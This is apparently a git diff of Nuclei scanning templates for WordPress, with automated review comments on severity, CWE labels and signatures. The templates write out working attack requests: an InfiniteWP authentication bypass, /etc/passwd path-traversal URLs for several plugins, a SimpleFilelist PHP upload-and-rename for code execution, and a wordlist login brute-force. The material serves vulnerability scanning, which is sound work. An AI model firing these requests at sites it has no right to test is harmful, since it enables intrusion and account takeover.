@@ -1,60 +0,0 @@ -id: wordpress-infinitewp-auth-bypass -info: - name: WordPress InfiniteWP Client Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - tags: wordpress,auth-bypass,wp-plugin -requests: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - - | - POST / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' - - type: regex - name: username - internal: true - group: 1 - part: header - regex: - - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' - matchers-condition: and - matchers: - - type: word - words: - - "wordpress_logged_in" - part: header - - type: word - words: - - "<IWPHEADER>" - part: body - - type: status - status: - - 200 
diff --git a/poc/wordpress/wordpress-installer-log-11290.yaml b/poc/wordpress/wordpress-installer-log-11292.yaml similarity index 100% rename from poc/wordpress/wordpress-installer-log-11290.yaml rename to poc/wordpress/wordpress-installer-log-11292.yaml diff --git a/poc/wordpress/wordpress-installer-log.yaml b/poc/wordpress/wordpress-installer-log.yaml index c439cb1149..3e84e512d7 100644 --- a/poc/wordpress/wordpress-installer-log.yaml +++ b/poc/wordpress/wordpress-installer-log.yaml @@ -1,27 +1,19 @@ id: wordpress-installer-log - info: name: WordPress Installer Log author: dwisiswant0 severity: info - metadata: - max-request: 1 - tags: wordpress,log - -http: + tags: wordpress,logs +requests: - method: GET path: - "{{BaseURL}}/installer-log.txt" - matchers-condition: and matchers: - type: regex regex: - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" part: body - - type: status status: - 200 - -# digest: 4b0a004830460221009a8e8d042e85d58401fa09b980054470d6d83085e609c9a5696cd5a080e6e8d7022100dc240d18371ec6d9889fa793fc444b08631d656fac8d07effae6073686a03dd8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-lfi.yaml b/poc/wordpress/wordpress-lfi.yaml deleted file mode 100644 index aea478a3f7..0000000000 --- a/poc/wordpress/wordpress-lfi.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: wordpress-LFI -info: - name: wordpress-LFI - author: 0x240x23elu - severity: High -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view" - - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/poc/wordpress/wordpress-login.yaml b/poc/wordpress/wordpress-login.yaml index 0372801292..7fecc16e01 100644 --- a/poc/wordpress/wordpress-login.yaml +++ b/poc/wordpress/wordpress-login.yaml @@ -1,13 +1,23 @@ id: wordpress-login + info: - name: WordPress login + name: WordPress Login Panel - Detect author: its0x08 severity: info + description: WordPress login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-login.php" + matchers: - type: word words: 
@@ -16,3 +26,5 @@ requests: - '/wp-login.php?action=lostpassword">Lost your password?</a>' - '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">' condition: or + +# digest: 4b0a0048304602210086807236a145972b89ecdaa833fe7f59fac5c4d3babd16cb539f81c3c8b6b603022100c24de61f99e5153228b3e5c418c3297c3adf10667ceb11498b4fe452e80528f7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-plugins-detect-11298.yaml b/poc/wordpress/wordpress-plugins-detect-11298.yaml index 586ac01da2..fb3b30feac 100644 --- a/poc/wordpress/wordpress-plugins-detect-11298.yaml +++ b/poc/wordpress/wordpress-plugins-detect-11298.yaml @@ -1,35 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection author: 0xcrypto severity: info tags: fuzz,wordpress - requests: - raw: - | GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/wordpress/wordpress-plugins-detect.yaml b/poc/wordpress/wordpress-plugins-detect.yaml index 93285d39f7..e6fcb6dba4 100644 --- a/poc/wordpress/wordpress-plugins-detect.yaml +++ b/poc/wordpress/wordpress-plugins-detect.yaml 
@@ -2,21 +2,31 @@ id: wordpress-plugins-detect info: name: WordPress Plugins Detection - author: 0xcrypto - severity: info - metadata: - max-request: 98135 + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress -http: +requests: - raw: - | - GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: - pluginSlug: helpers/wordlists/wordpress-plugins.txt + plugin: + - contact-form-7 + - wordpress-seo + - elementor + - woocommerce + - all-in-one-wp-migration + - updraftplus + - all-in-one-seo-pack + - duplicator + - essential-addons-for-elementor-lite + - optinmonster + - w3-total-cache + - redux-framework + - ninja-forms matchers-condition: and matchers: @@ -34,6 +44,4 @@ http: group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version - -# digest: 490a0046304402203dae0e85f594434c208f2bbb49a34444932fb2bbebfc79dd5927f3a559fc28840220779c3169c962d96c2f3e567212f7919cfc7df199c2b58bc160c12eb2ab74cc7e:922c64590222798bb761d5b6d8e72950 + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml index 1bb8c02019..988a740c1c 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml 
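Review bot: `severity: high` on the new side of wordpress-plugins-detect.yaml rates the presence of a plugin `readme.txt` as a high finding, although the matchers only confirm that a plugin is installed and extract its name and `Stable tag`. Inventory results will land in the high bucket of any report or alert rule keyed on severity; keep `severity: info`. The same change appears in the wordpress-themes-detect.yaml and wordpress-themes2.yaml hunks further down and should be reverted there as well.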
@@ -1,18 +1,25 @@ id: wordpress-rce-simplefilelist + info: - name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE + name: WordPress SimpleFilelist - Remote Code Execution author: princechaddha severity: critical - reference: https://wpscan.com/vulnerability/10192 - tags: wordpress,wp-plugin,rce + description: | + Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. + reference: + - https://wpscan.com/vulnerability/10192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 
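Review bot: The added `cwe-id: CWE-77` in wordpress-rce-simplefilelist-11299.yaml classifies the finding as command injection, while the description added in the same hunk describes an unauthenticated arbitrary file upload followed by a rename to a PHP file. Dashboards that group by CWE will file it under the wrong weakness class. `cwe-id: CWE-434` (unrestricted upload of a file with a dangerous type) matches what the requests exercise. The request block continues past this hunk.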
@@ -35,30 +42,32 @@ requests: Content-Disposition: form-data; name="file"; filename="nuclei.png" Content-Type: image/png - <?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> + <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word words: - - 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)' + - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)' + - "PHP Version" + - "Configuration Command" part: body + condition: and - type: word words: - 'text/html' @@ -66,3 +75,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/31 diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml index 988a740c1c..9c1cffb05d 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml 
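Review bot: The body matcher added in this hunk of wordpress-rce-simplefilelist-11299.yaml requires the marker string, `PHP Version` and `Configuration Command` together (`condition: and`), but phpinfo() normally labels that row `Configure Command`. If so, the matcher cannot succeed and the template reports nothing even on an affected install. Change the third word to `- "Configure Command"` or drop it. Separately, a match leaves `nuclei.php` with phpinfo() output under `/wp-content/uploads/simple-file-list/`; the description should tell the operator to remove it once the finding is recorded.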
@@ -1,19 +1,12 @@ id: wordpress-rce-simplefilelist - info: - name: WordPress SimpleFilelist - Remote Code Execution + name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha severity: critical + reference: https://wpscan.com/vulnerability/10192 description: | - Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - reference: - - https://wpscan.com/vulnerability/10192 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. tags: wordpress,wp-plugin,rce,intrusive,upload,python - requests: - raw: - | @@ -44,7 +37,6 @@ requests: <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- - - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} @@ -53,12 +45,10 @@ requests: Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php - - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers-condition: and matchers: - type: word @@ -75,5 +65,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/31 
diff --git a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml b/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml deleted file mode 100644 index 116e5709c7..0000000000 --- a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-redirection-plugin-listing -info: - name: WordPress Redirection Plugin Directory Listing - author: dhiyaneshDk - severity: info - description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/redirection/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/redirection/" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-redirection-plugin-listing.yaml b/poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml similarity index 100% rename from poc/wordpress/wordpress-redirection-plugin-listing.yaml rename to poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml diff --git a/poc/wordpress/wordpress-takeover-11311.yaml b/poc/wordpress/wordpress-takeover-11311.yaml index ce2834c9c3..a32bac0083 100644 --- a/poc/wordpress/wordpress-takeover-11311.yaml +++ b/poc/wordpress/wordpress-takeover-11311.yaml @@ -1,15 +1,15 @@ id: wordpress-takeover info: name: WordPress takeover detection - author: pdcommunity & geeknik + author: pdteam,geeknik severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,wordpress - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/wordpress-takeover-11312.yaml b/poc/wordpress/wordpress-takeover-11312.yaml new file mode 100644 index 0000000000..ce2834c9c3 --- /dev/null 
+++ b/poc/wordpress/wordpress-takeover-11312.yaml @@ -0,0 +1,23 @@ +id: wordpress-takeover +info: + name: WordPress takeover detection + author: pdcommunity & geeknik + severity: high + tags: takeover,wordpress + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "Do you want to register" + - ".wordpress.com</em> doesn’t exist" + condition: and + - type: word + words: + - "cannot be registered" + negative: true diff --git a/poc/wordpress/wordpress-takeover-11313.yaml b/poc/wordpress/wordpress-takeover-11313.yaml deleted file mode 100644 index ab41f8ff24..0000000000 --- a/poc/wordpress/wordpress-takeover-11313.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-takeover -info: - name: WordPress takeover detection - author: pdteam,geeknik - severity: high - tags: takeover,wordpress - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "Do you want to register" - - ".wordpress.com</em> doesn’t exist" - condition: and - - type: word - words: - - "cannot be registered" - negative: true diff --git a/poc/wordpress/wordpress-themes-detect-11316.yaml b/poc/wordpress/wordpress-themes-detect-11316.yaml new file mode 100644 index 0000000000..5d00b07f78 --- /dev/null +++ b/poc/wordpress/wordpress-themes-detect-11316.yaml @@ -0,0 +1,22 @@ +id: wordpress-themes-detect +info: + name: WordPress Theme Detection + author: 0xcrypto + severity: info + tags: fuzz,wordpress +requests: + - raw: + - | + GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + Host: {{Hostname}} + payloads: + themeSlug: helpers/wordlists/wordpress-themes.txt + threads: 50 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "== Description ==" 
diff --git a/poc/wordpress/wordpress-themes-detect.yaml b/poc/wordpress/wordpress-themes-detect.yaml index c6f7c7a2ee..4c487c4563 100644 --- a/poc/wordpress/wordpress-themes-detect.yaml +++ b/poc/wordpress/wordpress-themes-detect.yaml @@ -2,22 +2,22 @@ id: wordpress-themes-detect info: name: WordPress Theme Detection - author: 0xcrypto - severity: info - metadata: - max-request: 24434 + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress -http: +requests: - raw: - | - GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 Host: {{Hostname}} - payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 + theme: + - twentyfifteen + - shapely + - onepress + threads: 50 matchers-condition: and matchers: - type: status @@ -26,6 +26,4 @@ http: - type: word words: - - "== Description ==" - -# digest: 490a00463044022011e4cbe8a45d6ad61f783b572e5c03e16bb429a66bb973f1e0049de13b6aed410220067e14e44f6b612f6bdaccc4f46ec64cb7f80d843257e1e376208859ac6aac2d:922c64590222798bb761d5b6d8e72950 + - "== Description ==" \ No newline at end of file diff --git a/poc/wordpress/wordpress-themes2.yaml b/poc/wordpress/wordpress-themes2.yaml index 5d00b07f78..6a3c621ae8 100644 --- a/poc/wordpress/wordpress-themes2.yaml +++ b/poc/wordpress/wordpress-themes2.yaml @@ -1,16 +1,19 @@ id: wordpress-themes-detect info: name: WordPress Theme Detection - author: 0xcrypto - severity: info + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress requests: - raw: - | - GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 Host: {{Hostname}} payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt + theme: + - twentyfifteen + - shapely + - onepress threads: 50 matchers-condition: and matchers: 
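Review bot: In the first wordpress-themes-detect.yaml hunk the `payloads:` line is removed and not re-added, so on the new side `theme:` appears to sit directly under the request and `{{theme}}` in the raw path has nothing to resolve from. Indentation is lost on this page, so confirm against the file, but the wordpress-themes2.yaml hunk keeps `payloads:` as context and the same should hold here: restore `payloads:` above `theme:`. Both files also raise `severity: info` to `severity: high` for a template that only checks whether a theme's readme.txt is reachable. A presence check is informational, and `high` will put fingerprinting results in the same triage queue as real vulnerabilities, so keep `severity: info`.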
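Review bot: The trailing `# digest:` line is dropped in the second wordpress-themes-detect.yaml hunk without a replacement, so the edited template is left unsigned and consumers of this repository lose the means to check that it is the published, unmodified version. The same removal, paired with reverting `http:` to the older `requests:` key, appears in the wordpress-updraftplus-pem-key.yaml, wordpress-user-enum-11330.yaml and wordpress-wordfence-waf-bypass-xss-11353.yaml hunks. If the content change is intended, re-sign the file after editing rather than stripping the signature, and end the file with a newline (the hunk records `\ No newline at end of file`).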
diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml similarity index 100% rename from poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml rename to poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..a87b8fda8d 100644 --- a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -1,27 +1,36 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin -requests: + metadata: + max-request: 1 + tags: wordpress,wp-plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - 200 + +# digest: 4a0a004730450220740af42e52a68f0d6689e8a42beeed0b3a97aae6409f3ada8410b0de03a612e5022100a5a7de364e6d563966439fb830a1e355ce145bd70d1b17e1704dd01f1911e9b0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-updraftplus-pem-key.yaml b/poc/wordpress/wordpress-updraftplus-pem-key.yaml index fdc0197b59..60ce155fd0 100644 --- a/poc/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/poc/wordpress/wordpress-updraftplus-pem-key.yaml 
@@ -1,20 +1,15 @@ id: updraftplus-pem-keys - info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info reference: - https://www.exploit-db.com/ghdb/6437 - metadata: - max-request: 1 - tags: wp-plugin,edb,wordpress - -http: + tags: wordpress,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "updraftplus" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100f67881c034eb94b3163dd7e7e724002d05ef5d68777ecabd4a0f6e1ddaec2b4a022100eaa8e0704e2f22d863e7eafda11a6a3fedd0088891a706f52eb74c79fa6a1a9c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-user-enum-11330.yaml b/poc/wordpress/wordpress-user-enum-11330.yaml index 1cd64aba82..b113be4fbf 100644 --- a/poc/wordpress/wordpress-user-enum-11330.yaml +++ b/poc/wordpress/wordpress-user-enum-11330.yaml @@ -1,33 +1,24 @@ id: wordpress-user-enum - info: name: Wordpress User Enumeration author: r3dg33k severity: info - metadata: - max-request: 1 tags: wordpress - -http: +requests: - method: GET path: - "{{BaseURL}}/?author=1" - matchers-condition: and matchers: - type: regex regex: - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' part: header - - type: status status: - 301 - extractors: - type: regex part: header regex: - 'author\/\w+' - -# digest: 4a0a00473045022100a9bd51a7335e4a3132dc7adf1b5faad143902b92a257ce67c7554206bb1208e60220524362849327f5644ce5e078f58218d5ed17ceaa3b90982ac8eb73b44b8348d5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-weak-credentials-11336.yaml b/poc/wordpress/wordpress-weak-credentials-11336.yaml new file mode 100644 index 0000000000..a4747ae6ab --- /dev/null +++ b/poc/wordpress/wordpress-weak-credentials-11336.yaml 
@@ -0,0 +1,43 @@ +id: wordpress-weak-credentials +info: + name: WordPress - Weak Credentials + author: evolutionsec + severity: critical + description: | + Weak WordPress Credentials were discovered. + reference: + - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: wordpress,default-login,fuzz +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/wordpress/wordpress-weak-credentials-11337.yaml b/poc/wordpress/wordpress-weak-credentials-11337.yaml deleted file mode 100644 index 0bec5f6f85..0000000000 --- a/poc/wordpress/wordpress-weak-credentials-11337.yaml +++ /dev/null 
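Review bot: `severity: critical` in the new wordpress-weak-credentials-11336.yaml disagrees with the classification block in the same file, which gives `cvss-score: 5.8` and a vector ending in `C:L/I:N/A:N`, so consumers that sort on one field or the other will rank the finding differently. Make the fields agree; the wordpress-weak-credentials.yaml hunk later in this patch pairs `critical` with `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N` and `cvss-score: 9.3`. The template also runs a `clusterbomb` of login attempts at `threads: 50` but declares no request count. Adding a `metadata:` block with `max-request:`, as that later hunk does, lets an operator see the volume before running it against a site with login lockout or rate limiting.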
@@ -1,37 +0,0 @@ -id: wordpress-weak-credentials - -info: - name: WordPress Weak Credentials - author: evolutionsec - severity: critical - tags: wordpress,default-login,fuzz - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} - - log={{users}}&pwd={{passwords}} - - payloads: - users: helpers/wordlists/wp-users.txt - passwords: helpers/wordlists/wp-passwords.txt - threads: 50 - attack: clusterbomb - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - words: - - '/wp-admin' - - 'wordpress_logged_in' - condition: and - part: header \ No newline at end of file diff --git a/poc/wordpress/wordpress-weak-credentials.yaml b/poc/wordpress/wordpress-weak-credentials.yaml index a4747ae6ab..9b2b887072 100644 --- a/poc/wordpress/wordpress-weak-credentials.yaml +++ b/poc/wordpress/wordpress-weak-credentials.yaml @@ -1,4 +1,5 @@ id: wordpress-weak-credentials + info: name: WordPress - Weak Credentials author: evolutionsec @@ -8,11 +9,14 @@ info: reference: - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-1391 + metadata: + max-request: 276 tags: wordpress,default-login,fuzz -requests: + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -22,12 +26,14 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} + payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb stop-at-first-match: true + matchers-condition: and matchers: - type: word 
@@ -36,8 +42,9 @@ requests: - '/wp-admin' - 'wordpress_logged_in' condition: and + - type: status status: - 302 -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402206feaee39a07459925f48bcc9cadb2289ad56e2df23d9e1a6f44a5fec39b3e48d02202b1343c19604a13ccf017c07b3bffca05a5abe6fe91b604d99acf57af94797d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-woocommerce-listing-11338.yaml b/poc/wordpress/wordpress-woocommerce-listing-11338.yaml index 300e671075..88dd79b5d6 100644 --- a/poc/wordpress/wordpress-woocommerce-listing-11338.yaml +++ b/poc/wordpress/wordpress-woocommerce-listing-11338.yaml @@ -2,11 +2,10 @@ id: wordpress-woocommerce-listing info: name: WordPress Woocommerce Plugin Directory Listing author: dhiyaneshDK - severity: info + severity: low description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing,plugin,woocommerce + reference: https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing requests: - method: GET path: diff --git a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml b/poc/wordpress/wordpress-woocommerce-listing-11339.yaml deleted file mode 100644 index 41d380395c..0000000000 --- a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-woocommerce-listing -info: - name: WordPress Woocommerce Plugin Directory Listing - author: dhiyaneshDK - severity: info - description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing,plugin,woocommerce -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/woocommerce/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/woocommerce/" - condition: and - - type: status - status: - - 200 
